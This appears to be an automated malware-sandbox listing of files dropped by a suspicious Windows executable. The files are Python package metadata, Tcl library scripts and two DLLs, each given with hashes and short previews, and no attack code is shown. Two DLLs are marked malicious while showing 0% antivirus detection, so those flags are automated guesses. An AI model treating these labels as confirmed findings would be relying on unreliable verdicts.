                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                              MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                              SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                              SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                              SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                              Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                              MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                              SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                              SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                              SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3575
                                                                                                                                                                                                                              Entropy (8bit):5.085545958857746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D0h4aC/S802Vpnu3pyt1Q+/+DeVb0ksYSwTgD:Oc/z02Vpnu3pytS+2DeVNfSwTW
                                                                                                                                                                                                                              MD5:F659E7F578CE6FD3753871DBBBA1F939
                                                                                                                                                                                                                              SHA1:C53B0E6A2E3D94093E2FE4978926A7439B47D43C
                                                                                                                                                                                                                              SHA-256:508AE4FE43081C64B0B0A2828588B3A8CC3430C6693D1676662569400B0DFDB1
                                                                                                                                                                                                                              SHA-512:2C0496B76D259259A8F1E57F3ED2224A7E3E99FF309F764C00A8377BB5BD1C94035BDDF24BD1BA637209677CB9F4E8109F84C50B3488B5B8FC372B6BEDAB9AE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: zipp.Version: 3.19.2.Summary: Backport of pathlib-compatible object wrapper for zip files.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/zipp.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: test.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'test'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'test'.Requir
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1039
                                                                                                                                                                                                                              Entropy (8bit):5.8094923667268965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:An/2zDlvbqfuiwbWk/EsJ6Xam9lpW8OWq3tW36nJA3u3iWwksYW:AnuXlzUuitk/5J6f9lpW8OW4tM6nJSkE
                                                                                                                                                                                                                              MD5:1E77310EF3277C93430D969FEAC8FDFC
                                                                                                                                                                                                                              SHA1:173240337F249E2A6D54206AA0D0ACB0FDED12D7
                                                                                                                                                                                                                              SHA-256:F316F2E03FD9ADE7EBBC0B154706848E2BB8FD568B90935109F0D8E3CE2B9BFE
                                                                                                                                                                                                                              SHA-512:68F752DAF2DBEB79644337E4DB9B8CEAEAE3606A865EDC32BE16785DC97BDCF38EF200F0EDC86DC9D71ABA72E108D2851A510F0EB598FFEA286503F0C9772E5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:zipp-3.19.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..zipp-3.19.2.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..zipp-3.19.2.dist-info/METADATA,sha256=UIrk_kMIHGSwsKKChYizqMw0MMZpPRZ2ZiVpQAsN_bE,3575..zipp-3.19.2.dist-info/RECORD,,..zipp-3.19.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp-3.19.2.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..zipp-3.19.2.dist-info/top_level.txt,sha256=iAbdoSHfaGqBfVb2XuR9JqSQHCoOsOtG6y9C_LSpqFw,5..zipp/__init__.py,sha256=QuI1g00G4fRAcGt-HqbV0oWIkmSgedCGGYsHHYzNa8A,13412..zipp/__pycache__/__init__.cpython-312.pyc,,..zipp/__pycache__/glob.cpython-312.pyc,,..zipp/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp/compat/__pycache__/__init__.cpython-312.pyc,,..zipp/compat/__pycache__/py310.cpython-312.pyc,,..zipp/compat/py310.py,sha256=eZpkW0zRtunkhEh8jjX3gCGe22emoKCBJw72Zt4RkhA,219..zipp/glob.py,sha256=etWpnfEoRyf
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5
                                                                                                                                                                                                                              Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:m:m
                                                                                                                                                                                                                              MD5:9B929466EC7848714DE24BCF75AE57CB
                                                                                                                                                                                                                              SHA1:ECC9237295CDA9B690BE094E58FAE1458A4B0389
                                                                                                                                                                                                                              SHA-256:8806DDA121DF686A817D56F65EE47D26A4901C2A0EB0EB46EB2F42FCB4A9A85C
                                                                                                                                                                                                                              SHA-512:C8D8967BE2B5094A5D72BA4BEF5DBDA2CBF539BF3B8B916CF86854087A12DF82B51B7BF5B6EFA79898692EFD22FAD9688058448CAAB198FB708A0E661DC685EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:zipp.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1816344
                                                                                                                                                                                                                              Entropy (8bit):6.495049871908257
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:CAZ2kQrvqkPY6i6ktWc2uMOxmWu1/0lglMkgshwlfjwtorWy2eMdPhOC9JlQ5ZDR:CA0W9jEoSy2nd9JlQjaq5vWHZ7XM2eDD
                                                                                                                                                                                                                              MD5:3AE729942D15F4F48B1EA8C91880F1F4
                                                                                                                                                                                                                              SHA1:D27596D14AF5ADEB02EDAB74859B763BF6AC2853
                                                                                                                                                                                                                              SHA-256:FE62CA2B01B0EC8A609B48F165CA9C6A91653D3966239243AD352DD4C8961760
                                                                                                                                                                                                                              SHA-512:355800E9152DAAD675428421B867B6D48E2C8F8BE9CA0284F221F27FAE198C8F07D90980E04D807B50A88F92FFB946DC53B7564E080E2E0684F7F6CCC84FF245
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!.............................................................j....`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11707
                                                                                                                                                                                                                              Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                              MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                              SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                              SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                              SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6218
                                                                                                                                                                                                                              Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                              MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                              SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                              SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                              SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35136
                                                                                                                                                                                                                              Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                              MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                              SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                              SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                              SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):107674
                                                                                                                                                                                                                              Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                              MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                              SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                              SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                              SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118419
                                                                                                                                                                                                                              Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                              MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                              SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                              SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                              SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1555736
                                                                                                                                                                                                                              Entropy (8bit):6.1820383306760185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:gJ3uXVFKflt2zwvzPYHURwgVdF9EWyCzfdmHQnveD4CGan9nViFoHb15K3cmwdbo:yeFSpvzg0RwgVdF9EWyCzfdmHQnveD4Z
                                                                                                                                                                                                                              MD5:966580716C0D6B7EEC217071A6DF6796
                                                                                                                                                                                                                              SHA1:E3D2D4A7EC61D920130D7A745586CEB7AAD4184D
                                                                                                                                                                                                                              SHA-256:AFC13FCE0690C0A4B449EC7ED4FB0233A8359911C1C0BA26A285F32895DBB3D2
                                                                                                                                                                                                                              SHA-512:CF0675EA888A6D1547842BCFB27D45815B164337B4A285253716917EB157C6DF3CC97CBA8AD2AB7096E8F5131889957E0555BAE9B5A8B64745AC3D2F174E3224
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
